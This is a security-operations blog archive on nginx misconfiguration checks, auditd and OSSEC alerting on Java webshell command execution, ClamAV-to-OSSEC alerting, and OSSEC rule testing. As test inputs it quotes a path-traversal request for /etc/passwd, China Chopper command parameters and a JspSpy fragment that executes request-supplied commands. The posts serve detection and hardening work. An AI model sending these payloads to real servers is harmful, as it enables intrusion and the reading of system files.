Category archive: Security Operations

[Nginx] Configuration security issues

1. CRLF injection
Things to watch for:
a) the rewrite, return, add_header, proxy_set_header and proxy_pass directives;
b) use of $uri and $document_uri: both are URL-decoded, so an encoded CR/LF in the request path becomes a literal line break in the response; the correct variable is $request_uri, which keeps the raw request;

c) variables captured by a location regex, for example (?P<myvar>[^.]+), whose character class does not exclude line breaks.

First, test $uri by adding this configuration:

location /sectest {
  return 302 https://$host$uri;
}

Result (screenshot in the original post):

Change the configuration to:

location /sectest {
  return 302 https://$host$request_uri;
}

Result (screenshot in the original post):

Now test CRLF injection through a variable captured by the location regex. Add:

    location ~ /v1/((?<action>[^.]*)\.json)?$ {
        add_header X-Action $action;
        return 200 "OK";
    }

Result (screenshot in the original post):

The regex should be changed so that the captured value cannot contain whitespace, CR and LF included:

    location ~ /v1/((?<action>[^.\s]*)\.json)?$ {
        add_header X-Action $action;
        return 200 "OK";
    }

2. Response header override
If a location block has add_header directives of its own, only those apply; the add_header directives of the enclosing http and server blocks are inherited only when the location block defines none. The example from the official documentation:

server {
  listen 80;
  add_header X-Frame-Options "DENY" always;
  location / {
      return 200 "index";
  }

  location /new-headers {
    # Add special cache control
    add_header Cache-Control "no-cache, no-store, max-age=0, must-revalidate" always;
    add_header Pragma "no-cache" always;

    return 200 "new-headers";
  }
}

A request for / gets X-Frame-Options in the response:

GET / HTTP/1.0

HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 09 Jan 2017 19:28:33 GMT
Content-Type: application/octet-stream
Content-Length: 5
Connection: close
X-Frame-Options: DENY

index

A request for /new-headers does not get X-Frame-Options, because the location's own add_header directives replace the inherited one:

GET /new-headers HTTP/1.0


HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Mon, 09 Jan 2017 19:29:46 GMT
Content-Type: application/octet-stream
Content-Length: 11
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache

new-headers

3. Arbitrary file read caused by alias
Incorrect configuration:

location /files {
  alias /home/;
}

With this configuration a request for http://example.com/files/readme.txt returns /home/readme.txt.
A request for http://example.com/files../etc/passwd reads /etc/passwd: nginx matches the prefix /files and appends the rest of the path, ../etc/passwd, to /home/, giving /home/../etc/passwd.

Note that only a single ../ can be introduced this way, i.e. the traversal reaches one directory above the alias target. To show this I changed the nginx configuration to:

        location /files {
                alias /home/elk/;
        }

Fix:
The location prefix and the alias path must both end with / or both not end with /.
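The three checks above (decoded variables and loose regex captures from section 1, add_header override from section 2, mismatched alias slashes from section 3) can be automated in a few lines. The Python linter below is an added example, not code from the original post or from Gixy; its one-statement-per-line parser is a constructed simplification of nginx syntax, and the UNSAFE and FIXED configurations are constructed from the snippets above.

```python
import re

# Directives whose argument ends up in a response line, where a raw CR/LF
# splits the header (section 1).
UNSAFE_DIRECTIVES = {"return", "rewrite", "add_header", "proxy_set_header", "proxy_pass"}
# $uri and $document_uri are URL-decoded; $request_uri is not.
DECODED_VAR = re.compile(r"\$(?:uri|document_uri)\b")
# Named capture such as (?<action>[^.]*) or (?P<action>[^.]*) with a negated class.
NAMED_CAPTURE = re.compile(r"\(\?P?<(\w+)>(\[\^[^\]]*\][*+])")


def parse(conf):
    """Flatten an nginx config into (block stack, statement) pairs.
    Constructed simplification: one statement or one brace per line."""
    stack, statements = [], []
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.endswith("{"):
            stack.append(line[:-1].strip())
        elif line == "}":
            stack.pop()
        elif line.endswith(";"):
            statements.append((tuple(stack), line[:-1].strip()))
    return statements


def check_crlf(conf):
    """Decoded variables in output directives, and captures that admit CR/LF."""
    findings = []
    for _, stmt in parse(conf):
        name = stmt.split()[0]
        if name in UNSAFE_DIRECTIVES and DECODED_VAR.search(stmt):
            findings.append(f"{name} uses a URL-decoded variable: {stmt}")
    for m in NAMED_CAPTURE.finditer(conf):
        group, cls = m.group(1), m.group(2)
        if not re.search(r"\\s|\\r|\\n", cls):   # class must exclude whitespace
            findings.append(f"capture <{group}> {cls} does not exclude CR/LF")
    return findings


def check_header_override(conf):
    """A location with its own add_header drops every server-level add_header."""
    statements = parse(conf)
    server_headers = {s.split()[1] for ctx, s in statements
                      if ctx and ctx[-1] == "server" and s.startswith("add_header ")}
    per_location = {}
    for ctx, s in statements:
        if ctx and ctx[-1].startswith("location") and s.startswith("add_header "):
            per_location.setdefault(ctx[-1], set()).add(s.split()[1])
    return [f"{loc} redefines add_header and loses {sorted(server_headers - names)}"
            for loc, names in per_location.items() if server_headers - names]


def check_alias(conf):
    """location prefix and alias target must both end in / or both not."""
    findings = []
    for ctx, s in parse(conf):
        if ctx and ctx[-1].startswith("location") and s.startswith("alias "):
            prefix, target = ctx[-1].split()[-1], s.split()[1]
            if prefix.endswith("/") != target.endswith("/"):
                findings.append(f"{ctx[-1]} -> alias {target}: trailing slash mismatch")
    return findings


def lint(conf):
    return check_crlf(conf) + check_header_override(conf) + check_alias(conf)


# Constructed configurations assembled from the snippets in the post.
UNSAFE = r"""
server {
  listen 80;
  add_header X-Frame-Options "DENY" always;
  location /sectest {
    return 302 https://$host$uri;
  }
  location ~ /v1/((?<action>[^.]*)\.json)?$ {
    add_header X-Action $action;
    return 200 "OK";
  }
  location /files {
    alias /home/;
  }
}
"""

FIXED = r"""
server {
  listen 80;
  add_header X-Frame-Options "DENY" always;
  location /sectest {
    return 302 https://$host$request_uri;
  }
  location ~ /v1/((?<action>[^.\s]*)\.json)?$ {
    add_header X-Frame-Options "DENY" always;
    add_header X-Action $action;
    return 200 "OK";
  }
  location /files/ {
    alias /home/elk/;
  }
}
"""

if __name__ == "__main__":
    for finding in lint(UNSAFE):
        print("UNSAFE:", finding)
    print("FIXED:", lint(FIXED) or "no findings")
```

check_header_override flags the regex location in UNSAFE because its own add_header discards the server-level X-Frame-Options; FIXED repeats that header inside the block, which is what section 2 implies must be done.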

Gixy
The open-source tool https://github.com/yandex/gixy detects these kinds of problems in nginx configurations.
Install and run:

pip install gixy
gixy /etc/nginx/nginx.conf

It checks for:

[ssrf] Server Side Request Forgery
[http_splitting] HTTP Splitting
[origins] Problems with referrer/origin validation
[add_header_redefinition] Redefining of response headers by "add_header" directive
[host_spoofing] Request's Host header forgery
[valid_referers] none in valid_referers
[add_header_multiline] Multiline response headers

References:
https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html
https://mp.weixin.qq.com/s?__biz=MzIzOTQ5NjUzOQ==&mid=2247483699&idx=1&sn=6f0394df7be9aafd65c12002c2bb4f10&chksm=e9287d07de5ff41165757618d932021e1b8e036fd0c1b8305e38ad693097cf05e37b76928eb5&mpshare=1&scene=23&srcid=0714xbWwfcwuCe7XA9oIQryo#rd

Monitoring command execution by Java on Linux with auditd and alerting through OSSEC

0x01 The auditd service
auditd is the Linux kernel's native audit system. It records audit events and, from a security standpoint, can be used to monitor security-relevant activity on the host.
Its rules live in /etc/audit/audit.rules, one rule or watch per line, with the syntax:

-a <list>,<action> <options>

<list> is one of:

task
The per-task list, used only when a task is created. Only fields known at creation time (such as UID) can be used in this list.
entry
The syscall entry list, evaluated on entry to a system call to decide whether an audit event should be created.
exit
The syscall exit list, evaluated on return from a system call to decide whether an audit event should be created.
user
The user-message filter list. The kernel uses it to filter user-space events before passing them to the audit daemon. The only valid fields are uid, auid, gid and pid.
exclude
The event-type exclusion filter list, used to drop events the administrator does not want to see; the msgtype field names the message types not to log.

<action> is one of:

never
Do not generate an audit record.
always
Allocate an audit context, always fill it in at syscall entry, and always write an audit record at syscall exit. If a program uses this system call, an audit record is started.

<options> are:

-S <syscall>
Specify a system call by name or number. To specify all system calls, use all as the name.
-F <name[=,!=,<,>,<=]value>
Specify a rule field. If several fields are given for one rule, an audit record is started only when all of them are true. Each field must be introduced by its own -F, and up to 64 fields may be given.
Commonly used fields:
pid
Process ID.
ppid
Process ID of the parent process.
uid
User ID.
gid
Group ID.
msgtype
Message type number; valid only on the exclude filter list.
arch
Processor architecture of the system call. Give an exact architecture such as i686 (obtainable with uname -m), or b32 to use the 32-bit syscall table or b64 to use the 64-bit table.
...

0x02 Writing a rule to monitor Java command execution
JBoss runs as the nobody user, so add an audit rule for its uid:

# grep '\-a' /etc/audit/audit.rules 
-a exclude,always -F msgtype=CONFIG_CHANGE
-a exit,always -F arch=b32 -F uid=99 -S execve -k webshell

Restart the service:

# service auditd restart
Stopping auditd: [ OK ]
Starting auditd: [ OK ]

Test with webshells:
1) China Chopper (caidao)
The parameters passed by the Chopper shell are:

tom=M&z0=GB2312&z1=-c/bin/sh&z2=cd /;whoami;echo [S];pwd;echo [E]

The code that runs them:

else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);

The audit log:

type=EXECVE msg=audit(1500273887.809:7496): argc=3 a0="/bin/sh" a1="-c" a2=6364202F7765622F70726F6A6563742F7A616F6A69617379732E6A69616E73686539392E636F6D2E636563616F707379732F636563616F707379732F3B77686F616D693B6563686F205B535D3B7077643B6563686F205B455D

2) JspSpy
The parameters passed to JspSpy are:

o=shell&type=command&command=netstat+-antlp&submit=Execute

The code that runs them:

String type = request.getParameter("type");
if (type.equals("command")) {
ins.get("vs").invoke(request,response,JSession);
out.println("<div style='margin:10px'><hr/>");
out.println("<pre>");
String command = request.getParameter("command");
if (!Util.isEmpty(command)) {
Process pro = Runtime.getRuntime().exec(command);
BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String s = reader.readLine();

The audit log:

type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"


0x03 OSSEC configuration
OSSEC already ships a decoder for auditd events:

<decoder name="auditd">
  <prematch>^type=</prematch>
</decoder>
.......

but no ready-made rule was found under rules/, so edit local_rules.xml and add:

<group name="syslog,auditd,">
  <rule id="110000" level="0" noalert="1">
    <decoded_as>auditd</decoded_as>
    <description>AUDITD messages grouped.</description>
  </rule>
  <rule id="110001" level="10">
    <if_sid>110000</if_sid>
    <match>EXECVE</match>
    <description>Java execution command</description>
  </rule>
</group>

Test:

[root@localhost ossec]# ./bin/ossec-logtest 
2017/07/17 16:28:26 ossec-testrule: INFO: Reading local decoder file.
2017/07/17 16:28:26 ossec-testrule: INFO: Started (pid: 9463).
ossec-testrule: Type one log per line.

type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"


**Phase 1: Completed pre-decoding.
       full event: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'
       hostname: 'localhost'
       program_name: '(null)'
       log: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'

**Phase 2: Completed decoding.
       decoder: 'auditd'

**Phase 3: Completed filtering (rules).
       Rule id: '110001'
       Level: '10'
       Description: 'Java execution command'
**Alert to be generated.

Then add the log file to the agent configuration:

  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/audit/audit.log</location>
  </localfile>

After running a system command through JspSpy, the alert appears:

[root@localhost ossec]# tail -f /var/ossec/logs/alerts/alerts.log 
** Alert 1500280231.400419: mail  - syslog,auditd,
2017 Jul 17 16:30:31 (agent-31) 10.110.1.31->/var/log/audit/audit.log
Rule: 110001 (level 10) -> 'Java execution command'
type=EXECVE msg=audit(1500280229.507:7665): argc=1 a0="pwd"

One more thing to consider is a whitelist: some of the company's sites legitimately call system commands, for example for video processing. To avoid false positives a whitelist is needed.
Edit local_rules.xml again and add a whitelist rule, placed above the EXECVE rule (OSSEC evaluates sibling rules in order, so the first match wins):

<group name="syslog,auditd,">
  <rule id="110000" level="0" noalert="1">
    <decoded_as>auditd</decoded_as>
    <description>AUDITD messages grouped.</description>
  </rule>
  <rule id="110001" level="0">
    <if_sid>110000</if_sid>
    <regex>whoami|passwd</regex>
    <description>Java execution white list</description>
  </rule>
  <rule id="110002" level="10">
    <if_sid>110000</if_sid>
    <match>EXECVE</match>
    <description>Java execution command</description>
  </rule>
</group>

With this in place, running whoami and cat /etc/passwd no longer produces an alert.
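To show what the audit records in 0x02 actually contain and how the whitelist rule in 0x03 behaves on them, here is an added Python example (not code from the original post or from OSSEC). It decodes the hex-encoded arguments auditd emits when an argument contains a space, reconstructs the full command line, and compares the page's substring whitelist (whoami|passwd over the raw line) with an exact-match allow-list. The sample records, the allow-list contents and the hypothetical triage() helper are constructed for this example.

```python
import re

# auditd prints an EXECVE argument as "quoted text" unless it contains a space,
# a quote or a control character, in which case it is hex-encoded and unquoted
# (the a2=6364... value in the Chopper record above is such an argument).
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')


def parse_execve(line):
    """argv of a type=EXECVE record as a list of str (hex arguments decoded), else None."""
    if not line.startswith("type=EXECVE"):
        return None
    args = {}
    for m in ARG_RE.finditer(line):
        index, quoted, hexed = m.groups()
        args[int(index)] = (quoted if quoted is not None
                            else bytes.fromhex(hexed).decode("utf-8", "replace"))
    return [args[i] for i in sorted(args)]


# Constructed allow-list: the whole command must match, not a substring.
ALLOWED_COMMANDS = {"whoami", "cat /etc/passwd"}


def is_allowed(argv):
    """True only when the decoded command is exactly an allowed command.
    A `sh -c <script>` wrapper is judged by its script, so a chained script
    such as 'cd /;whoami;...' is not allowed even though it contains whoami."""
    if len(argv) == 3 and argv[0].endswith("sh") and argv[1] == "-c":
        return argv[2].strip() in ALLOWED_COMMANDS
    return " ".join(argv) in ALLOWED_COMMANDS


OSSEC_WHITELIST = re.compile(r"whoami|passwd")   # the regex of rule 110001 above


def ossec_whitelisted(line):
    """What the page's rule does: a substring regex over the raw log line."""
    return bool(OSSEC_WHITELIST.search(line))


def triage(line):
    """Hypothetical helper: decoded argv plus both whitelist verdicts."""
    argv = parse_execve(line)
    if argv is None:
        return None
    return {"argv": argv,
            "alert": not is_allowed(argv),
            "ossec_whitelisted": ossec_whitelisted(line)}


# Constructed sample records (timestamps and serials are made up); the first
# one is built the way auditd would encode the Chopper z2 parameter.
CHOPPER_SCRIPT = "cd /;whoami;echo [S];pwd;echo [E]"
SAMPLE_LOGS = [
    'type=EXECVE msg=audit(1500000000.001:1): argc=3 a0="/bin/sh" a1="-c" a2='
    + CHOPPER_SCRIPT.encode().hex().upper(),
    'type=EXECVE msg=audit(1500000000.002:2): argc=1 a0="whoami"',
    'type=EXECVE msg=audit(1500000000.003:3): argc=2 a0="cat" a1="/etc/passwd"',
    'type=EXECVE msg=audit(1500000000.004:4): argc=3 a0="/bin/sh" a1="-c" a2="id;whoami"',
    'type=SYSCALL msg=audit(1500000000.004:4): arch=40000003 syscall=11 success=yes',
]

if __name__ == "__main__":
    for log in SAMPLE_LOGS:
        print(triage(log))
```

Two things follow from running it. The Chopper command line is hex-encoded, so neither whoami nor anything else in it is visible to a regex over the raw line; the page's rule alerts on that record only because the whitelist never matches. A substring whitelist also passes any command that merely contains whoami, such as the chained id;whoami record, which the exact-match version still alerts on. Note also that the rule in 0x02 uses -F arch=b32 and therefore matches only the 32-bit execve; on an x86_64 host a second rule with -F arch=b64 is needed to see a 64-bit JVM.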

 

Deploying ClamAV on Linux and alerting through OSSEC

[root@server120 local]# yum install gcc openssl openssl-devel pcre pcre-devel clamav clamd -y

After installation the signature database must be updated.
The updater is /usr/bin/freshclam.
The default configuration file is /etc/freshclam.conf:

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
/var/lib/clamav #location of the signature database
UpdateLogFile /var/log/clamav/freshclam.log
LogSyslog yes
DatabaseOwner clam
DatabaseMirror db.local.clamav.net #mirror that updates are fetched from

Change the configuration to:

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
DatabaseDirectory /var/lib/clamav
UpdateLogFile /var/log/clamav/freshclam.log
DatabaseOwner clam
DatabaseMirror db.cn.clamav.net
DatabaseMirror db.local.clamav.net

Then update the database:

[root@localhost ossec]# /usr/bin/freshclam
[root@localhost clamav]# ll /var/lib/clamav/
total 341836
-rw-r--r-- 1 clam clam 693248 Jul 14 10:20 bytecode.cld
-rw-r--r-- 1 clam clam 41839208 Jul 14 10:20 daily.cvd
-rw-r--r-- 1 clam clam 307499008 Jul 14 10:03 main.cld
-rw------- 1 clam clam 156 Jul 14 10:22 mirrors.dat

daily.cld and daily.cvd hold the same data; daily.cvd is the compressed form and daily.cld is not.
freshclam checks whether new updates have been published since the last check; if so it downloads the diff files, and if the diff download fails it downloads a complete new daily.cvd.

ClamAV installs a daily cron job, /etc/cron.daily/freshclam, that updates the database:

LOG_FILE="/tmp/freshclam.log"
if [ ! -f "$LOG_FILE" ]; then
    touch "$LOG_FILE"
    chmod 644 "$LOG_FILE"
    chown clam.clam "$LOG_FILE"
fi

/usr/bin/freshclam \
    --quiet \
    --datadir="/var/lib/clamav" \
    --log="$LOG_FILE"

Once the database is updated, run a scan.
The idea is that OSSEC already ships a decoder and rules for ClamAV scan results.
etc/decoder.xml:

<decoder name="clamd">
  <program_name>^clamd</program_name>
</decoder>

<decoder name="freshclam">
  <program_name>^freshclam</program_name>
</decoder>

rules/clam_av_rules.xml:

  <rule id="52502" level="8">
    <if_sid>52500</if_sid>
    <match>FOUND</match>
    <description>Virus detected</description>
    <group>virus</group>
  </rule>

The decoder matches a syslog header whose program name is clamd, so the log must be in syslog format for the alert to be parsed, and the default -l option writes a non-syslog log. Test:
The test directory contains some sample files; I copied a file obtained during an earlier incident response into /tmp.

[root@localhost ossec]# /usr/bin/clamscan -i -r /tmp/ -l /var/log/clamav.log
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

/var/log/clamav.log is not in syslog format:

[root@localhost ossec]# cat /var/log/clamav.log

-------------------------------------------------------------------------------

/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

/etc/clamd.conf has a LogSyslog parameter:

[root@localhost ossec]# cat /etc/clamd.conf | grep LogSys
LogSyslog yes

Setting it to yes would send output to syslog (facility local6 by default), but testing showed that this configuration file is not loaded and the setting has no effect (clamd.conf is read by the clamd daemon, not by clamscan), so logger is used to write syslog instead.
Change the rsyslog configuration:

*.info;mail.none;authpriv.none;cron.none;local6.none /var/log/messages #add local6.none
local6.notice /var/log/clamav.log

[root@localhost ossec]# service rsyslog restart
[root@localhost ossec]# /usr/bin/clamscan --infected -r /tmp -i | logger -it clamd -p local6.notice
[root@localhost ossec]# cat /var/log/clamav.log 
Jul 14 11:22:45 localhost clamd[1723]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
Jul 14 11:22:45 localhost clamd[1723]: 
Jul 14 11:22:45 localhost clamd[1723]: ----------- SCAN SUMMARY -----------
Jul 14 11:22:45 localhost clamd[1723]: Known viruses: 6300501
Jul 14 11:22:45 localhost clamd[1723]: Engine version: 0.99.2
Jul 14 11:22:45 localhost clamd[1723]: Scanned directories: 221
Jul 14 11:22:45 localhost clamd[1723]: Scanned files: 95
Jul 14 11:22:45 localhost clamd[1723]: Infected files: 1
Jul 14 11:22:45 localhost clamd[1723]: Data scanned: 2.79 MB
Jul 14 11:22:45 localhost clamd[1723]: Data read: 2.62 MB (ratio 1.06:1)
Jul 14 11:22:45 localhost clamd[1723]: Time: 11.950 sec (0 m 11 s)

Have OSSEC monitor this file by adding:

  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/clamav.log</location>
  </localfile>

[root@localhost ossec]# /var/ossec/bin/ossec-control restart

The resulting alert:

[root@localhost ossec]# tail -n 5 /var/ossec/logs/alerts/alerts.log 
** Alert 1500002954.2336: mail - clamd,freshclam,virus
2017 Jul 14 11:29:14 (192.168.192.1953) any->/var/log/clamav.log
Rule: 52502 (level 8) -> 'Virus detected'
Jul 14 11:29:14 localhost clamd[2077]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

Four further issues need consideration.
1) Signature whitelist
Create the file whitelist-signatures.ign2 in the database directory and list the signature names to ignore, one per line.
For example, for Dirty COW: Unix.Exploit.CVE_2016_5195-2

2) Symbolic links: will linked files be scanned twice?

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -h
--follow-dir-symlinks[=0/1(*)/2] Follow directory symlinks (0 = never, 1 = direct, 2 = always)
--follow-file-symlinks[=0/1(*)/2] Follow file symlinks (0 = never, 1 = direct, 2 = always)

0 means symlinks are never followed; 1 means a symlink is followed only when it is passed to clamscan directly as an argument; 2 means symlinks are always followed. The default is 1.
Test with a symlink:

[root@server120 tmp]# ln -s /tmp/makeudp /tmp/makeudp1 

With --follow-file-symlinks=0 the linked file is not found:

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=0 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

With --follow-file-symlinks=1 and no explicit argument, the linked file is not found:

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

With --follow-file-symlinks=1 and /tmp/makeudp passed explicitly, the linked file is found (and reported twice, once for the directory scan and once for the explicit argument):

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp /tmp/makeudp
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

With --follow-file-symlinks=2 the linked file is found:

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=2 -r /tmp 
/tmp/makeudp1: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

So by default symlinked files are not scanned.
3) Many hosts mount network storage, and those directories need to be excluded.
They can be excluded with a pattern such as --exclude-dir="^/sys".
Mounts whose device starts with 10. or 192. are excluded with the following pipeline, which builds an alternation of their mount points:

df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'

4) Because the cron job runs in the early hours every day, a scan that reaches a storage device may well not finish within a day. The script must therefore check whether a scan is still running and skip the new one if so; an abnormally long scan should also be alerted on, so add an OSSEC rule that fires when the scan time exceeds 6 hours.
Add to rules/clam_av_rules.xml:

  <rule id="52510" level="7">
      <if_sid>52500</if_sid>
      <match>Time: </match>      
      <regex>\(\d\d\d\d |\(4\d\d |\(5\d\d |\(6\d\d |\(7\d\d |\(8\d\d |\(9\d\d |\(36\d |\(37\d |\(38\d |\(39\d </regex>
      <description>ClamAV scan time over 6hours</description>
  </rule>

PS: writing the regex as \d{4} does not work here, nor does [1-9]: OSSEC's own regex engine supports neither {n} repetition nor bracketed character classes, hence the alternation above.
Then test the OSSEC alert:

Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)


**Phase 1: Completed pre-decoding.
       full event: 'Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)'
       hostname: 'localhost'
       program_name: 'clamd'
       log: 'Time: 11.888 sec (360 m 11 s)'

**Phase 2: Completed decoding.
       decoder: 'clamd'

**Phase 3: Completed filtering (rules).
       Rule id: '52510'
       Level: '7'
       Description: 'ClamAV scan time over 6hours'
**Alert to be generated.

The final cron job script:

#!/bin/bash

# Directories never to scan: pseudo filesystems, data and upload trees
WHITEDIR="^/proc/|^/sys/|^/data|^/test|/upload"

# Skip this run if the previous scan is still running
ps axu | grep clamscan | grep -v grep > /dev/null
if [[ $? == 0 ]]; then
       exit
fi

# Network mounts (device starting with 10. or 192.) joined as ^/mnt/a|^/mnt/b
NFSDIR=`df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'`

# The original script tested the undefined variable $NFS here, so the
# network mounts were never excluded; it must test $NFSDIR
if [[ -n $NFSDIR ]]; then
        WHITEDIR="${WHITEDIR}|${NFSDIR}"
fi

# Scan / and send every output line to syslog as clamd so OSSEC can decode it
COMMAND="/usr/bin/clamscan  -i --exclude-dir='${WHITEDIR}' -r / | logger -it clamd  -p local6.notice"

if [ -f "/usr/bin/clamscan" ];then
        eval $COMMAND &
fi
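The following Python, an added example rather than code from the original post, reproduces the decisions the script and the OSSEC rule make so they can be checked offline: the 6-hour rule of point 4, both as an integer comparison on the clamscan summary line and as the literal alternation from rule 52510, the mount-point exclusion pattern of point 3, and the running-scan check. The df, ps and log lines it uses are constructed.

```python
import re

SIX_HOURS = 360  # minutes, the threshold chosen in point 4

# clamscan summary line as it arrives through logger, e.g.
# "... clamd[2077]: Time: 11.888 sec (360 m 11 s)"
TIME_RE = re.compile(r"Time: [\d.]+ sec \((\d+) m (\d+) s\)")

# The alternation from rule 52510 in Python syntax: four or more digits,
# 400-999, or 360-399 minutes, each followed by a space.
OSSEC_RULE_52510 = re.compile(
    r"\(\d\d\d\d |\(4\d\d |\(5\d\d |\(6\d\d |\(7\d\d |\(8\d\d |\(9\d\d "
    r"|\(36\d |\(37\d |\(38\d |\(39\d ")


def scan_minutes(line):
    """Whole minutes from a clamscan 'Time:' summary line, None for other lines."""
    m = TIME_RE.search(line)
    return int(m.group(1)) if m else None


def scan_too_long(line, limit=SIX_HOURS):
    minutes = scan_minutes(line)
    return minutes is not None and minutes >= limit


def ossec_rule_matches(line):
    return OSSEC_RULE_52510.search(line) is not None


def nfs_exclude_pattern(df_output):
    """Mount points whose device starts with 10. or 192., joined as ^/a|^/b
    (the same result as the df | egrep | awk | sed pipeline in point 3)."""
    mounts = [line.split()[5] for line in df_output.splitlines()
              if re.match(r"(?:10|192)\.", line)]
    return "|".join("^" + m for m in mounts)


def clamscan_running(ps_output):
    """True when a clamscan process appears in `ps axu` output (skip this run)."""
    return any("clamscan" in line and "grep" not in line
               for line in ps_output.splitlines())


# Constructed sample data.
DF_OUTPUT = """\
Filesystem             Size  Used Avail Use% Mounted on
/dev/sda1               50G   12G   38G  24% /
10.1.2.3:/export/data  2.0T  1.1T  900G  56% /mnt/data
192.168.1.10:/backup   500G  200G  300G  40% /mnt/backup
"""
PS_IDLE = "root  1234  0.0  0.1  11120  2000 ?  S  10:00  0:00 /bin/bash /etc/cron.daily/scan.sh\n"
PS_BUSY = PS_IDLE + "clam  1240 99.0 12.0 900000 480000 ?  R  10:00  5:59 /usr/bin/clamscan -i -r /\n"
LOG_SHORT = "Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (0 m 11 s)"
LOG_LONG = "Jul 14 11:29:15 localhost clamd[2077]: Time: 21611.888 sec (360 m 11 s)"

if __name__ == "__main__":
    print("exclude pattern:", nfs_exclude_pattern(DF_OUTPUT))
    print("scan running:", clamscan_running(PS_BUSY))
    for line in (LOG_SHORT, LOG_LONG):
        print(scan_minutes(line), scan_too_long(line), ossec_rule_matches(line))
```

The two implementations of the 6-hour rule agree on 359, 360 and four-digit minute values, which is the point of spelling the alternation out: it is the only way to express "at least 360" in OSSEC's regex dialect.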

 

[OSSEC] Log decoding and alert rule configuration

OSSEC is an open-source, multi-platform intrusion detection system that runs on Windows, Linux, OpenBSD/FreeBSD and macOS. It provides log analysis, integrity checking and rootkit detection.

1. Testing and verifying OSSEC decoders and alert rules

OSSEC ships the ossec-logtest tool for testing its decoders and alert rules; it is normally installed in /var/ossec/bin.

Example:

/var/ossec/bin/ossec-logtest
2014/06/11 13:15:36 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:15:36 ossec-testrule: INFO: Started (pid: 26740).
ossec-testrule: Type one log per line.
Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2

**Phase 1: Completed pre-decoding.
full event: 'Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Accepted publickey for root from 172.16.24.121 port 38720 ssh2'

**Phase 2: Completed decoding.
decoder: 'sshd'
dstuser: 'root'
srcip: '172.16.24.121'

**Phase 3: Completed filtering (rules).
Rule id: '10100'
Level: '4'
Description: 'First time user logged in.'
**Alert to be generated.

As shown above, for the input log line:

Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2

the line goes through three phases and generates a level 4 alert, rule ID 10100, with the description "First time user logged in."

Running ossec-logtest -v gives a more detailed trace of the analysis:

/var/ossec/bin/ossec-logtest -v
2014/06/11 13:44:52 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:44:52 ossec-testrule: INFO: Started (pid: 27091).
ossec-testrule: Type one log per line.

Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Did not receive identification string from 172.16.24.121'

**Phase 2: Completed decoding.
decoder: 'sshd'
srcip: '172.16.24.121'

**Rule debugging:
Trying rule: 1 - Generic template for all syslog rules.
*Rule 1 matched.
*Trying child rules.
Trying rule: 5500 - Grouping of the pam_unix rules.
Trying rule: 5700 - SSHD messages grouped.
*Rule 5700 matched.
*Trying child rules.
Trying rule: 5709 - Useless SSHD message without an user/ip and context.
Trying rule: 5711 - Useless/Duplicated SSHD message without a user/ip.
Trying rule: 5721 - System disconnected from sshd.
